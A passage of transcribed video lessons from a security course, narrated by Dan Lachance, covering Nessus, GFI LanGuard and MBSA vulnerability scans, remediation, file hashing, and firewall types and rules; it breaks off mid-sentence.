Basic Network Scan- Chicago Subnet 1. [He types this in the Name text box.] So down below, I have to
specify the targets, whether it's a single host or a network range. I'm going to specify the network range of
192.168.1.1-192.168.1.254. Now over on the left, I can also click on other options I want to include in this
scan such as Scheduling. [He selects the Schedule option in the left section. Its content includes the Enable
Schedule toggle button.] Currently the schedule is not turned on, but I could turn on the schedule to determine
when I want this vulnerability assessment to be conducted. However, I will leave it on manual invocation,
which was the default setting. Under DISCOVERY on the left, I'm going to click on that link to determine
exactly how hosts are discovered. [He clicks the DISCOVERY subsection and its content is displayed.] Here
it's going to conduct a common port scan but I could choose from the list from other profiles such as Port scan
(all ports), or even I could choose Custom. [He points to the Scan Type drop-down list box.] I'm going to leave
it on Port scan (common ports). For ASSESSMENT, over on the left, [He selects the ASSESSMENT
subsection.] I can also determine what types of items I want to specify, in terms of what I want to scan for. So
here I'm going to choose Scan for all web vulnerabilities (quick) [He selects this option in the Scan Type drop-
down list box.] and down below, I can see exactly what it's going to do.
So let's go and Enable CGI scanning, it's going to start crawling from the root of the web site and so on. I've
got a few report options here I might be interested in, [He selects the REPORT subsection.] such as allowing
the results of the scan to be editable [He points to the Allow users to edit scan results checkbox.] or displaying
hosts that respond to ping, [He points to the Display hosts that respond to ping checkbox.] or displaying even
unreachable hosts within the range that I specified. [He points to the Display unreachable hosts
checkbox.] And on ADVANCED, if I click on that on the left, [He selects the ADVANCED subsection.] I've
got a few options here related to performance as I'm running the scan. So when I'm happy with my settings, I'll
go ahead and Save what I've configured, [He clicks the Save button at the bottom of the subpage. Now the My
Scans list in the Nessus Home / Scans web page includes the Basic Network Scan - Chicago Subnet 1 list
item.] because the next thing we'll do, because we didn't configure scheduling, is we'll have to invoke it
manually. We can do that from this list by clicking the Launch button, it looks like the play button. So I'm
going to go ahead and click on that [He clicks the Launch button adjacent to the list item.] and I can now see
the timestamp from when it started conducting this scan. At any point in time, while the scan is running, I can
click on this little Running icon. [He clicks the Running icon adjacent to the list item and the Basic Network
Scan - Chicago Subnet 1 subpage opens.] And will take me into another page that shows me what it's
discovered so far, in terms of the number of hosts, and any vulnerabilities it might have found on them so far.
So here we only see it's started scanning the first IP address in the range and it found one host, but we really
don't have much more. But as we wait a little bit longer we'll see this screen updating as it discovers more
hosts and vulnerabilities. Ideally no vulnerabilities, but that's why we're running this tool. So let's wait a few
minutes, and then we'll come back and see what it's found. So now that the scan's been running for a few
minutes, we can see it's discovered numerous hosts on the network. Now, most of these look good because
blue, according to the legend, is just informational messages about the device. However, any colors, like when
we start getting into the orange colors, or red if it finds critical vulnerabilities, that needs to draw our attention.
So here we've got a host that apparently has one, [He points to the host IP address 192.168.1.1.] there's a little
number one here, one medium vulnerability. Now to get details about what that is, I could click on the IP
address for that host over on the left. That's going to jump me into a page specifically about that device and
what's been learned so far, [This page displays information about the IP address such as the severity, plugin
name, and count.] bear in mind, the scan is still not complete. So here we've got a medium vulnerability that
was found related to the DNS Server Cache.
At the same time, I can also see over here, the IP address, the DNS name and when this scan was started for
this particular host. I can even download a report of found vulnerabilities here to a file, [This information is
available under the Host Details section.] so I can then deal with a remediation of those discovered issues.
Now, I'm going to go back to the scans screen, so I'll click on the Scans link at the top of the screen. [The
Nessus Home / Scans page opens.] At any point in time, I can go ahead and pause or stop that scan, [He points
to the Pause and Stop buttons adjacent to the list item under the My Scans list.] and after it's stopped, I'll get
an X here. I can even delete it in the future. However, I'm just going to click stop. Now it asks me if I'm sure I
want to stop the scan, now realistically, you want it to continue. However, in the interest of time here, we're
going to stop it. Another interesting thing we can do here in Nessus is go up to the Policies link, where we can
build a new policy. [He clicks the New Policy button in the Policies tabbed page and the Policy Library
subpage opens. It includes several template options.] Which really essentially let's build a custom set off
settings that we can base scans on. So here in my scanner templates, in this example, I'll choose Host
Discovery. [The New Policy / Host Discovery subpage opens. It is divided into two sections. The left section is
the navigation pane, which contains the BASIC, DISCOVERY, and REPORT subsections. The BASIC
subsection includes the General and Permissions options. The General option is selected by default and its
content is displayed in the section on the right. It contains two text boxes, Name and Description.] Then I'm
going to call this CustomHostDiscovery1. And on the left I'll click DISCOVERY, to see exactly how it's
discovering hosts on the network. [The content of the DISCOVERY subsection includes the Scan Type drop-
down list box.] Sometimes you might want to first just identify what it is exists on the network prior you
actually conduct a detailed scan of those devices. So here I'm going to choose OS Identification [He selects
this option in the Scan Type drop-down list box.] for OS fingerprinting, and I'm going to click Save. So now
I've got a saved policy called CustomHostDiscovery1, [The Policies tabbed page now includes the
CustomHostDiscovery1 item under the All Policies list.] but how do I use this? Well, what I need to do is click
on the Scans link up at the top. And when I click New Scan on the left, if I scroll all the way down to the
bottom, I'm going to see my custom policies, such as my CustomHostDiscovery1 policy. [This policy appears
under the User Created Policies section in the Scan Library subpage.] So from there, if I load that up by
clicking on it, I can build a new scan, schedule it, and then start conducting my vulnerability assessment based
on these customized settings.
Objectives
[Topic title: Common Vulnerability Scanning Tools. The presenter is Dan Lachance.] In this video I'll talk
about common vulnerability scanning tools.
The goal of vulnerability scanning is to identify and address weaknesses. Although unlike penetration testing,
we aren't testing the behavior when we try to exploit those weaknesses. So therefore, vulnerability scanning is
quite passive and shouldn't disrupt production systems. We need to have a database of known security
misconfigurations, common attack vectors, known suspicious activity, and also known suspicious activity
remnants within the database that is used by the vulnerability scanning tool. Now, this database, of course,
needs to be updated as these things change over time. With a noncredentialed scan, we get similar results that
would be achieved when a malicious user does scanning during reconnaissance. Whereas a credentialed scan
has access to systems. And it really kind of mimics a compromised account within the company and what
could be learned using that compromised account. Vulnerability scanning tools often have other abilities, such
as the ability to correlate scan results with past activity to see what's changed. It could also have the ability to
identify false positives that might even be configurable in some tools. We can also compare scan results with
best practices, and in some cases, auto-remediate devices that don't adhere to best practices. We can also
compare current scan results with previous scan results overall. This way, we can plan response plan priorities
when it comes to incident response.
There should always be ongoing scans, since the threat landscape is changing all of the time. Some
vulnerability scanning tools are command line based. Others have a GUI, like GFI LanGuard, which I'm using
here. [The configuration tabbed page of the GFI LanGuard 2014 window is open.] Regardless of the solution
of your choice, they have a lot of commonalities in terms of their functionality. For instance, here under
Agents Management on the left, [The presenter points to the Agents Management option under the
Configurations section, which is selected by default. Its content is displayed in the content section.] I can
deploy agents to other computers for further scanning. I also have the option on the left of configuring a
Scanning Profile. For instance, I'll click the Vulnerability Assessment scanning profile on the left. [He clicks
the Vulnerability Assessment subnode of the Scanning Profiles node under the Configurations section.] Then
over on the right, maybe for High Security Vulnerabilities, [Its content includes the High Security
Vulnerabilities list item. There is the Edit this profile link adjacent to this item.] I'll click the Edit this profile
link. [The GFI LanGuard 2014 Scanning Profiles Editor dialog box opens.] So essentially, I can customize
what I am scanning for within my Vulnerability Assessment. [The dialog box includes the Profile categories
section, which further includes the Vulnerability Assessment option.] So here we've got hundreds upon
hundreds of High Security Vulnerabilities that get checked. [The content of the Vulnerability Assessment
option is displayed in the content section of the dialog box.] And I have the option, of course, of deselecting
some if I don't want to check them. The more things you're checking for, the longer it takes. But then at the
same time, the more thorough the scan results that you get in the end. Over on the left, I also have the option of
Scheduling Scans. [He right-clicks the Scheduled Scans node under the Configurations section and selects the
New scheduled scan option from the shortcut menu. As a result, the New scheduled scan wizard
opens.] Scheduling scans is important so that we scan either a single computer or a bunch of computers on the
network or the whole network. So that we are keeping up to date with any newer threats or newer suspicious
activity.
We also have the option in many of these vulnerability scanning tools to store an application inventory. [He
clicks the Applications Inventory node under the Configuration section and its content is displayed in the
content section.] It will scan for software installed on devices so it can give you recommendations on whether
or not something should be removed or configured differently. There's also software updating, which I've
clicked on in the left hand-navigator here, [He clicks the Software Updates node under the Configuration
section and its content is displayed in the content section.] where we can configure software updates that
would be automatically downloaded or autodeployed to machines that are missing them. All vulnerability
scanners have some kind of an option for alerting. [He clicks the Alerting Options node under the
Configuration section.] For example, sending an email message to administrators by connecting to a mail
server. Vulnerability scanners always have a database that they use when they conduct vulnerability
assessments, and that database must be kept up to date. [He clicks the Database Maintenance Options node
under the Configuration section.] But, for example, if I were to go into Program Updates on the left in this
tool, [He clicks the Program Updates node under the Configuration section and its content is displayed in the
content section.] then I can see I've got options for the Vulnerabilities Database Update, and I can see when it
was last kept up to date. You'll find common vulnerability scanning tools from Qualsys. Nessus is a common
open-source vulnerability scanning tool that we'll take a look at in another Linux demonstration. There's
OpenVAS, Nexpose, Nikto, Microsoft Baseline Security Analyzer, and the list goes on and on and on.
Objectives
[Topic title: Scan for Vulnerabilities using Microsoft Baseline Security Analyzer. The presenter is Dan
Lachance.] There are quite a lot of tools out there that will let you conduct a vulnerability scan of a Unix,
Linux or Windows host. In this video I'll demonstrate how to use the free Microsoft Baseline Security
Analyzer, or MBSA, to conduct a scan.
So I've already downloaded and installed the Microsoft Baseline Security Analyzer. You can see I've got a
shortcut icon here on my desktop. So I'm going to go ahead and double-click to launch the tool. [The Microsoft
Baseline Security Analyzer 2.3 window opens. It includes a section, which is titled Check computers for
common security misconfigurations. This section includes the Scan a computer and Scan multiple computers
options.] Now here, MBSA can be used to scan a single computer for vulnerabilities or multiple computers.
Here, I'll choose Scan a computer. [A page opens that is titled Which computer do you want to scan? It
includes the Computer name and IP address drop-down list boxes. It also includes the Security report name
text box.] It automatically picks up the local computer name, but I could also have specified the IP address.
The report that it generates will use these variables where %D is for the name of the domain, %C is for the
computer name and so on. I'm going to accept the defaults for that. The options that have selection marks by
default include to check for Windows admin vulnerabilities, weak passwords, IIS administrative
vulnerabilities, SQL server administrative vulnerabilities. And just to check that security updates have been
installed successfully on the host. [These are the checkboxes present under the Options section of the
page.] So at this point, I'm going to go ahead and click the Start Scan button in the bottom right. And we can
now see that it's getting the latest security update information from Microsoft online and it's begun to scan. [A
page opens that is titled Report Details for QUICK24X7 - CM001.] So now that it's had a chance to scan, we
can see the results of our security vulnerability scan on this host, specifically called CM001.
So as we scroll down further through the results, we can see where there were problems. In this case for SQL
Server, we're missing security updates, as well as for Windows and for Silverlight as well as System
Center. [These issues are displayed under the Security Update Scan Results section.] But as we keep going
through, we'll get a sense of what was scanned and where the problems are. Such as automatic updates not
being installed in the computer even though there are outstanding updates or more than two administrative
accounts found on the machine. Password settings, Windows Firewall problems, as well as file system
scans. [These issues are displayed under the Administrative Vulnerabilities section.] Checking to see which
services are currently running but may not be necessary because they're not being used. [He points to the
Additional System Information section.] IIS web server issues that we have to address. In this case, there are
none, they all have a green shield symbol. And as you can see as we scroll down, we can see all of the items
that were tested. In this case for SQL Server, we have a number of items like SQL service accounts and
password policies. So different vulnerability scanning tools will scan a single host, as we've done here, or
numerous hosts and will report on different items. Down at the bottom, of course, here we can print the report
or copy it to the clipboard so we can work with this data in other tools. [These options are available at the
bottom of the page.]
In this video, we learned how to scan a host for vulnerabilities using the Microsoft Baseline Security Analyzer.
Objectives
[Topic title: Review Vulnerability Scan Results. The presenter is Dan Lachance.] In this video, we'll take a
look at the result of a vulnerability scan.
Now, there are plenty of tools that can conduct vulnerability scans. Here we've got GFI LanGuard 2014, [The
Scan tabbed page of the GFI LanGuard 2014 window is open.] where we've already conducted a scan of an IP
range. And we can see by looking at the Scan Results Overview that it found numerous hosts on the
network. [He points to the Scan Results Overview section in the Scan tabbed page.] Now, the host that we're
currently running this from is a different color listed down here towards the bottom left of the listing of hosts.
However, what I'm going to do is pick on, let's say, the computer here with the name of LIVINGROOM,
which apparently is running Windows 10. And I'm going to expand the Vulnerability Assessment on that host
in the left-hand navigator. Then I'll click Low Security Vulnerabilities. [In the Scan Results Overview section,
he clicks the Low Security Vulnerabilities subnode under the Vulnerability Assessment node of the
192.168.1.94 address. Its content is displayed in the Scan Results Details section.] Here it talks about HTTPS,
running, and HTTP, running. So in other words, there's a web server. Now, if that's not what you expected
because that might be a workstation, that's a problem. It's got a larger attack surface than it really needs. And
we all know that to harden a system, you should really only make sure it runs what is absolutely required and
nothing more. If I were to click Potential Vulnerabilities on that host, [He clicks the Potential Vulnerabilities
subnode under the Vulnerability Assessment node of the 192.168.1.94 address and its content is displayed in
the Scan Results Details section.] it talks a little bit about ports that might be open and might be used by a
Trojan. In this example, for example, TCP port 9090. Now, if I open up, for that same host, the Network and
Software Audit category and expand Ports, I can see the open ports here. [He clicks the Open TCP Ports
subnode under the Network and Software Audit node of the 192.168.1.94 address and its content is displayed
in the Scan Results Details section.] So port 80 for a web server. Because it's a Windows machine with file
and print sharing, I see ports 135 and 139. But as I go further down, I can also see that port 9090, again, is
listed.
Now, this is a specific packet sniffer tool. And it could spell problems. Because it could be some kind of a
Trojan listener. Or it could be some kind of a back door or spyware. So this should be setting off alarm bells.
Because we might say that that is a workstation that shouldn't be running a web server, let alone some other
remote packet sniffer on port 9090. Now, when you're looking at the results of a scan, of course you're going to
want to save it to make sure it's available for historical purposes or over time so that you can start to think
about your remediation actions. So of course, in this tool, on the upper left drop-down arrow icon [He clicks
the Main Menu icon at the top of the GFI LanGuard 2014 window. A list of options appears that includes the
File option.] and under File, [A flyout appears that includes the Save Scan Results and Load Scan Results
from options.] I could choose to save the scan results. And often, it saves it in a format such as XML or CSV,
or even to a database with some tools. And in the future, you can load the scan results. However let's take a
look at couple of other options after having run a vulnerability scan. So under the Remediate tab in this
particular tool, it's showing me things that really need attention. [The Remediate tabbed page includes the
navigation section on the left. It contains the Entire Network node, which is selected by default. Its content is
displayed in the section on the right. It includes two tabs, Remediation Center and Remediation Jobs. The
Remediation Center tabbed page includes a section that is titled List of missing updates for current
selection.] Now, on the left, I can choose specific hosts as a result of the scan. But here I've got Entire
Network selected, so it applies to all of them. And it's talking about a lot of Windows updates and Service
Packs that really should be applied. [The list includes the Critical Update and Service Pack nodes.] So for
example, under Critical Update, there are two updates here, such as one here for Server 2012 R2. And if I
expand it, I can see which hosts are missing it. Now, notice, I do have the option to remediate. Which means,
in this case, apply the updates. So not only is this tool doing a vulnerability scan, but it gives me the ability to
do something about what was found. If I were to go under the Reports tab in this particular tool, [The Reports
tabbed page includes the navigation section on the left. It contains the Entire Network node, which is selected
by default. Its content is displayed in the section on the right. It includes two tabs, Settings and Search. The
settings tabbed page includes the Reports section.] there are numerous reports that are available. And you can
run them based on the results of your scan. So for example, maybe I'll take a look at the Network Security
Overview report. [This node is selected by default in the Reports section. As a result, the section adjacent to
the Reports section is titled Network Security Overview.]
Now, on the left, again, I've got the Entire Network selected. So everything that was found through the result
of my scan settings. And if I generate the report by clicking the Generate Report button, [This button is present
in the Network Security Overview section.] let's see what we get. [Another tab, Network Security Overview,
gets added in the content section.] We should have some kind of a general security overview report based on
all of the machines that were scanned when we conducted our vulnerability assessment. Okay, so after a
minute, we've got our Network Security Overview report. And if we scroll down here, it's really nicely done.
We can see we've got nice, colorful charts. Now, it's not about the colors or the pretty pictures, it's about what
they represent. So our vulnerability level overall is flagged here as being medium. That is not good. We can
also see a pie chart here that shows us our vulnerability distribution in terms of high, medium, and low. [This
information is displayed under the Network Security Overview section.] As we scroll further down, we start to
see a breakdown. So apparently, we have no firewall issues out of what was scanned on our network. But we
have a lot of missing updates, which is a problem. [This information is displayed under the Security Sensors
section.] So as we scroll further down, we could read more and more about that report. So we've got all kinds
of great things that we can do with this. Now, you also have the option of choosing the format that you want to
use for an attachment by sending this through email or by saving it. So if I click the little icon with the floppy
disk, I see that the format is set to PDF. [These icons are present at the top of the Network Security Overview
tabbed page.] So if I were to actually click right on the icon itself, it gives me PDF Export Options. [The PDF
Export Options dialog box opens.] So we can save the report in various ways. Of course, you've also got
options available towards the upper left here, where you can search through the report for something specific
or actually print it on paper. Now, there are many other reports. We're not going to go through all of them. But,
for instance, if we're working with card holder data, like debit and credit cards, then we would be very
interested in PCI DSS compliance. So here, maybe I'll choose PCI DSS Requirement 1.2 Open - Ports. [He
selects the PCI DSS Requirement 1.2 - Open Ports subnode under the PCI DSS Compliance Reports node in
the Reports section of the Settings tabbed page. As a result, the title of the section adjacent to the Reports
section gets changed to PCI DSS Requirement 1.2 - Open Ports.] And I'll click Generate Report on the
right. [This button is present in the PCI DSS Requirement 1.2 - Open Ports section. Another tab, PCI DSS
Requirement 1.2 - Open Ports, gets added in the content section.] So really, these kinds of vulnerability
scanning tools have a lot of reporting capabilities. It takes a lot of the manual grunt work away from us, so we
can spend more time focusing on actually doing what we should be doing, securing the network.
So as I scroll down through here, I have a listing per each computer for TCP and UDP ports. Now, a -1 under
Process ID means it's not even open on that host. [He points to the TCP Ports and UDP Ports sections under
the PCI DSS Requirement 1.2 - Open Ports tabbed page.] But as we scroll further down, in this case, I can see
the computer is CM001. We've got a number of open TCP ports. And that might be required legitimately. But
it's a great report that quickly shows us the port utilization, in this case, for PCI DSS compliance.
Objectives
[Topic title: Vulnerability Remediation. The presenter is Dan Lachance.] In this video, I'll discuss
vulnerability remediation. It's one thing to identify vulnerabilities, but it's another to remove or mitigate that
vulnerability.
We address identified vulnerabilities ideally before malicious users do, and we might be required to do this for
legal or regulatory compliance reasons. So ideally, we'll have an automated schedule by which we get
vulnerability scan results so that we can identify these vulnerabilities. Manual remediation is possible. So for
example, if we discover that Remote Desktop is enabled on crucial Windows servers and we don't want it
enabled, then we could manually turn off Remote Desktop on each and every server that has that configuration.
Of course, enterprise class tools will always have a way to automate this remediation. Now it can also include
things like missing software patches, security misconfigurations, even the detection of malware where we've
configured it to automatically quarantine or remove the offending software. Vulnerability remediation allows
us to prioritize our vulnerabilities. We can then determine the business impact if those vulnerabilities were to
be exploited. So business process interruption, or it could even impact in a different way such as by degrading
IT system performance. Sandbox testing allows us to have a controlled environment to observe the
effectiveness of a remediation.
So when the IT technicians are testing vulnerability remediation, whether it be manual or automatic, this
should be done in a controlled environment. Often, it's done in a virtualized environment. Whether you've
already got that available on premises on your own equipment, or whether you're doing it in the cloud where it
takes only a few moments to spin up virtual machines to test things. When we implement remediation, we have
to think about remediation inhibitors. Some inhibitors include cost. It might be too expensive to pay for the
time for someone to get this configuration for auto remediation, for example, up and running. There's also
complexities. Now really, it's like anything that's worth doing. If you have the time to focus on something
properly from the beginning, so to do it right the first time, really, configuring auto remediation is not really
that complex. Now there are laws and regulations that might stipulate that we must enable auto remediation.
As an example, consider a configuration baseline here in Microsoft System Center Configuration
Manager. [The Baseline tabbed page of the System Center Configuration Manager window is open. It includes
the Assets and Compliance section.] A baseline contains numerous settings. In this case, we're checking
registry settings for a line of business apps. Now if I were to right-click on that configuration baseline, and if I
were to choose Deploy to apply it to a collection of devices, [The presenter right-clicks the Check client
Custom LOB App settings subnode under the Assets and Compliance section and selects the Deploy option
from the shortcut menu. As a result, the Deploy Configuration Baselines dialog box opens.] one of the things I
would notice is I have the option to remediate noncompliant settings when supported. [The Remediate
noncompliant rules when supported checkbox is present in the Deploy Configuration Baselines dialog
box.] So for instance, if we've got specific settings for an application, and maybe those are simply registry
entries, then we could auto-remediate that if it would make that application more secure as an example. Now to
finish this example, I would have to specify a collection down here by clicking the Browse button of users or
computers, [The Browse button is present adjacent to the Collection field under the Select the collection for
this configuration baseline deployment section. As a result, the Select Collection dialog box opens. It includes
a drop-down list box.] in this case devices [He selects the Device Collections option in the drop-down list
box.] where I want this done. So maybe I'll choose the All Systems collection. So we can deploy our
configuration baseline with auto-remediation to the devices of our choosing. On a larger network, it's a good
idea to have some kind of central way to deploy remediations, even if that's in the form of updates, as opposed
to going to each system one at a time. So we also need a way to track progress and run reports on either the
success or failure of implementation of remediation solutions.
So, overtime, we can also run reports or future scans to track the effectiveness of any fixes that have been
remediated. And we can update organizational security policies, or documentation, even that used by training
for new user on-boarding as required.
Objectives
Exercise Overview
[Topic title: Exercise: Describe Ways of Reducing Vulnerabilities. The presenter is Dan Lachance.] In this
exercise, you'll begin by explaining the difference between symmetric and asymmetric encryption.
Then after that you'll explain the purpose of Identity Federation, followed by describing the contents of a PKI
certificate. And then it's on to the action, where you'll compute a file hash using Windows. And you'll do the
same thing except you'll compute the file hash using the Linux operating system. At this point, pause the
video, perform each of the exercise steps and then come back to view the solutions.
Solution
Symmetric encryption uses the same key for encryption and decryption.
The key is called a shared secret. But it doesn't scale well because it's difficult to securely transmit this key to
multiple users. With asymmetric encryption, two keys are used, one for encryption and one for decryption.
Unique mathematically related public and private key pairs are issued to users' devices or applications. Where
the public key is used to encrypt and the private key is used to decrypt. Identity Federation allows us to use a
centralized identity provider that supports single sign-on. Applications have to be configured to trust the
identity provider. And likewise, the identity provider must be configured to trust applications. After successful
authentication, the result is a digitally signed security token from the identity provider. Applications verify that
signature authenticity before allowing resource access. So with Identity Federation it removes the need then for
multiple sets of credentials. Among other items, a PKI Certificate will contain the digital signature of the
issuing Certificate Authority.
It will include the subject name, which might be an email address or the URL of a web site. It will include a
public key, a private key, key usage details, as well as an expiry date. We can open up PowerShell in Windows
to generate a file hash of a file. We can use the get-filehash commandlet followed by the name of the file.
Here, I've got a text file called Project1.txt. [He executes the get-filehash .\Project1.txt command.] Notice that
we've got the hash visible here. Any changes made to the file will result in a different hash value if we run the
get-filehash commandlet in the future. In the Linux environment, I can use the md5sum command to generate a
file hash. Here I've got a file called log1.txt. So I'm going to type md5sum log1.txt. [He executes this
command in the root@kali command prompt window.] And here we can see the resultant hash, which will be
different if the contents of log1.txt change.
Table of Contents
After completing this video, you will be able to recognize the purpose of various types of firewalls.
Objectives
[Topic title: Firewalling Overview. The presenter is Dan Lachance.] In this video I'll do a firewalling
overview. Firewalls come in either hardware or software form and their general purpose is to control the flow
of network traffic into or out of a network or even individual host.
Now we can configure our firewalls with on-premises equipment or we can do it, if it's supported by a public
cloud provider, in the cloud. Firewall solutions from Palo Alto Networks also include virtual machine
appliance firewalls that are pre-installed and require only custom configuration. Now stateful firewalls are
designed to track connection state, or sessions, as opposed to each individual packet within the session. Now
this is considered more secure than a stateless firewall which does just that, it tracks each individual packet and
does not have the capability to track a session. All computing devices should really have a firewall solution
installed. This includes servers, desktops, laptops, tablets, and of course, smartphones. A packet filtering
firewall is one that examines packet headers as seen pictured here on the right-hand side of the screen. [The
following information is displayed: source port : https (443), Destination port: 55940 (55940), open square
bracket stream index: 38 close square bracket, Sequence number: 91765 (relative sequence number),
Acknowledgement number: 19197 (relative ack number), Header length: 32 bytes, Flags: Ox10 (ACK),
window size: 309 ] So for instance, in this packet header, we see a source and a destination port, a sequence
number, an acknowledgement number, which means it must be a TCP header. We see things like header
length, and so on. So packet filtering firewalls can look at many of these types of fields to decide whether
traffic is allowed or denied. So by looking at things like the IP protocol ID, source and destination IP address,
as we see in our picture here on the screen, the source and destination port number, maybe the ICMP message
type or additional IP options and flags. A web application firewall is a little bit more detailed because it's
designed to really dig a little bit deeper in the packet payload beyond just the headers.
It's often referred to as a WAF, a W-A-F, and it is specific to HTTP connections, whereas packet filtering
firewalls can look at any type of traffic. Another type of firewall is a proxy server. It's designed to retrieve
Internet content for internal clients that request it, so it's really masking or hiding the true identity of those
requesting clients. Another benefit of a proxy server is content that is retrieved can be cached to speed up
subsequent requests. A reverse proxy server listens for connection requests, for example from Internet clients
for a given network service such as a web server. So for instance, the proxy server might listen for TCP port 80
web site connections. And then what it will do is take those incoming connections from the Internet and
forward them to an internal host, a web server, listening elsewhere, ideally on a different port number. But it
doesn't have to be a different port number. Address translation is another way to firewall where it hides the
internal identity of hosts. However, routing needs to be enabled on your translation device and the hosts that
need to use that translation device. For example, if you're going to be using port address translation to get a
bunch of clients out on the Internet, they need to point to that translation device as their default gateway.
Network address translation, often called NAT, means that we've got multiple external-facing public IPs that
each map to a different internal private host IP. So we're protecting the true identity of those internal hosts,
while allowing incoming connections from the outside. Port Address Translation is often referred to as PAT.
This is where we can allow multiple internal clients to access the Internet through a single public IP address
configured on the PAT device. We then have to consider encrypted traffic when thinking about firewalls. So,
for example, if packet headers are encrypted, firewalls won't be able to read them. Now, there are some
exceptions.
Some firewalling tools will allow you to inject some kind of a certificate or key to decrypt transmissions. But
for the most part, when we talk about encrypted network traffic, it's not the headers that are encrypted. Usually
we're talking about the payload or the actual data that is encrypted. We should also consider the use of a
variety of firewall vendor solutions to increase security. So for example, if one of our firewalls gets
compromised by a malicious user they won't be able to use that same exploit against another firewall in the
enterprise because we would be using a different vendor's solution. We should also consider how we're going
to have a central standardized way to configure and deploy firewall settings to numerous devices. We might do
this through scripts, so whether it's a Linux Shell Script or a Windows PowerShell Script. We might even use
PowerShell Desired State Configuration, or DSC, to configure firewall settings on multiple devices, including
Linux. Or if you're in an Active Directory environment, you might consider the use of Active Directory and
group policy to essentially configure the Windows firewall for Windows devices.
After completing this video, you will be able to recognize how firewall rules are created based on what type of
traffic should or should not be allowed.
Objectives
recognize how firewall rules are created based on what type of traffic should or should not be allowed
[Topic title: Firewall Rules. The presenter is Dan Lachance.] In this video I'll talk about Firewall Rules.
Firewall Rules control network traffic flow. Traffic is either allowed or denied on a per-network interface
level. A firewall appliance, whether it's a server, physical or virtual, with multiple network interfaces or a
router, is going to have more than one interface, so we then can control the rules and tie them to a specific
interface. So the traffic can be coming into an interface or it could be leaving an interface, and when we
configure Firewall Rules, depending on the product that we're using, we'll have to specify that distinction.
Firewalls can be network based, so we have to think about the placement of the firewall appliance, so that it
can see all the traffic that it potentially would allow or deny. And of course, every host on the network, be it a
server, a laptop, or a smartphone, and so on, should have a host based firewall configured, in addition to our
network based firewall solutions. With Firewall Rules we should have a deny all traffic by default rule.
Then we would add rules to allow traffic only as we need them. So for instance if we need to allow HTTP
traffic then we could add a rule to allow that. But if any packets come in through the firewall that don't match
that HTTP rule then our deny all by default would kick in. Rules are processed using a top down approach. So
the first matching rule, so if there's some kind of criteria that matches what's in a packet, it gets executed and
no further rules get checked. So the last rule then in your list of rules should be a deny all. Some products will
actually display this because it's there automatically whereas others won't display it even though it is effective.
Here on the screen we see some examples of inbound rules. [A table with six columns and four rows is
displayed. The column headers are Allow/deny, Protocol type, Source, Destination, Port, and
Interface.] Where we get to decide in the left most column whether we are allowing or denying traffic. Notice
our last rule at the bottom denies all protocols from all sources going to all destinations for all interfaces.
However, our first rule allows TCP traffic from a specific source subnet of 172.16 with a 16 bit subnet mask.
And it allows that type of traffic to a specific host, in this case 172.16.0.56 for port 22 which is used for SSH
remote administration. And that's allowed on our firewall device through interface Ethernet zero.
Now we can also see the second example allows TCP traffic from all sources to all destinations as long as the
port number is 443, so HTTPS secured web traffic. And that again is tied to interface eth0. Our third rule
allows UDP traffic from any source to a specific destination going to port 53. Now if you recall, DNS client
queries are sent to UDP port 53 on the DNS server. So this is allowing DNS server queries from clients to
reach host 172.16.0.100. We should also consider whether or not we're going to log firewall actions, whether
packets are accepted or dropped because they don't meet the conditions that were specified in rules. If we're
going to turn on logging, then we probably want to turn on log forwarding so that our log information is stored
on another host as well. So if the firewall appliance itself gets compromised, while the logs can't be trusted of
course, we've got a copy elsewhere on a trusted host. In our logs we also have to decide whether or not we
want to see IP addresses for the data that we're logging to the firewall. Or, whether we want to do reverse DNS
name lookups to see the actual DNS names of the hosts connecting through the firewall. Now in many cases
you probably don't want to use reverse DNS name lookups while the log information is being generated,
because it's a little too resource intensive and takes time to do the reverse lookups. So instead, another option is
to have IP addresses of hosts logged in the firewall logs. And then if you need to when you're analyzing the
logs later, you can do the reverse DNS name lookups to get the names of the hosts if that's helpful. And that
could be a manual or an automated process. In this video we talked about Firewall Rules.
[Topic title: Packet Filtering Firewalls. The presenter is Dan Lachance.] In this video, I'll discuss packet
filtering firewalls. Packet filtering firewalls are also called Layer 4 firewalls.
This is because they are designed to examine packet headers, specifically things like UDP and TCP headers,
which map to Layer 4 of the OSI model. So therefore, packet filtering firewall cannot examine packet payload.
It can't look at the actual data, such as a specific URL that the user is connecting to, or a specific HTTP get
request. So therefore, there are restrictions for certain website, or data within packets, that are simply not
possible with packet filtering firewalls. Packet filtering firewalls can be stateless, where each individual packet
is seen as a separate connection. Also, a packet filtering firewall might be stateful, where it tracks packets
within a session.
When we configure a packet filtering firewall, we allow or deny traffic based on criteria. Which includes
things such as an IP protocol ID, which implies what type of packet this really is. Or a source and destination
IP address that specifically would apply to Layer 3 of the OSI model. We might also have a source and
destination port number, an ICMP message type, IP options and flags, and so on. Pictured on the screen, we've
got a red arrow pointing to the headers within a packet capture. [Dan refers to the following information
displayed on screen: Frame 91 (453 bytes on wire, 453 bytes captured), Ethernet II, src: 90:48:9a:11:bd:6f
(90:48:9a:11:bd:6f), Dst: 14:cf:e2:9f:9b:e7 (14:cf:e2:9f:9b:e7), Internet Protocol, src: 192.168.0.8
(192.168.0.8), Dst: 192.229.163.25 (192.229.163.25), Transmission Control Protocol, src port: 57683
(57683), Dst Port: http (80), seq: 400, Ack: 56918, Len: 399, Hypertext Transfer Protocol. ] The headers
begin with the Ethernet II header, which is containing information such as the source and destination MAC
address. We then see the Internet protocol or IP header, which, among other things, contains the source and
destination IP address. We can also see the Transmission Control Protocol header here in our screenshot, the
TCP header. Which, among other things, shows us the source and destination port for the connection, as well
as things like sequence and acknowledge numbers. Finally, we can also see the Hypertext Transfer Protocol
header, which is selected.
But down at the bottom in this packet capture we see the actual hexadecimal representation of that data, or
payload, on the left, and the ASCII equivalent on the right. So a packet filtering firewall will not be able to go
in and read that payload as we see it at the bottom of the screen. So again, it can't take a look at a file that a
user requested from a website. So a packet filtering firewall then, really applies to Layers 3 and 4. So when we
say it's a Layer 4 firewall, it applies Layers underneath it like 3. It can deal with protocol types, IP addresses,
port numbers, and so on. In our example on the screen we've got 3 firewall rules. The first rule is an SSH TCP
port 22 rule, to allow SSH remote administration traffic. [A screenshot of a web page is displayed. The page
displays a table with many columns and three rows. Some of the column headers are Rule#, Type, Protocol,
Port Range, Source, Allow/Deny. The table displays three types of rules. The Add another rule button is also
displayed.] We can see that we can specify a source, which in this case is an entire subnet, 172.16.0.0/16. And
of course, our rule is set to allow. Below it we are allowing HTTPS port 443 traffic from any source. And our
last rule here is denying all traffic from all sources. Common packet filtering firewall products include
